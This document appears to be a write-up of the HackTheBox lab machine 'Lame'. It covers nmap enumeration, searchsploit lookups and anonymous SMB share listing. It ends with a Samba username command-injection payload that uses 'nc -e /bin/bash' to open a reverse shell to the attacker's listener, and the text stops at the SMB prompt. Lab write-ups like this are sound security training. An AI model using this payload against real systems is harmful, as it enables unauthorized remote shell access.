As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Tue Jan 4 23:19:29 2022 as: nmap -p- -sS --min-rate 5000 -T5 -n -Pn -oN allPorts 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.048s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
# Nmap done at Tue Jan 4 23:19:56 2022 -- 1 IP address (1 host up) scanned in 26.84 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan those ports more in depth and save the result into a file:
We could see there is an exploit that we could use, let's try it. To copy that exploit script to the current folder, we just need to execute searchsploit with the -m option indicating the exploit path:
searchsploit -m unix/remote/49757.py
If we execute the exploit with the IP address of the targeted machine we will see that nothing happens.
python 49757.py 10.10.10.3
No worries, let's try to find other ways to gain access to the machine. If we look into the nmap scan, we could see that port 139 and 445 are open. These ports are usually used by the SMB service. Also, nmap reported the version of the SMB service, which is Samba smbd 3.0.20-Debian. Once again, let's try to find any exploit associated to that version with searchsploit.
It looks like there are some interesting exploits. Let's inspect the Metasploit one.
searchsploit -x unix/remote/16320.rb
If we take a look at the script, we can see that the only thing it does is login into the SMB server with the user /=nohup payload . Let's try to exploit this vulnerability manually.
First, we will need to try to list shares.
smbclient -L //10.10.10.3/ -N
-L get a list of shares available on the host.
-N makes use of a null session, don't ask for password.
If you ever get this error, try to add the following parameter to the command:
--option="client min protocol=NT1"
Let's run the final command in order to list shares:
smbclient -L //10.10.10.3/ -N --option="client min protocol=NT1"
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
We are able to lists shares successfully. It's time to get a shell. The idea is to get into the tmp share and login with the malicious user.
First of all, we have to set a netcat listener:
nc -lvnp 4444
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
We get into the tmp share and then we login with the user "/=`nohup nc -e /bin/bash 10.10.14.7 4444`"to get a reverse shell.
smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1"
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
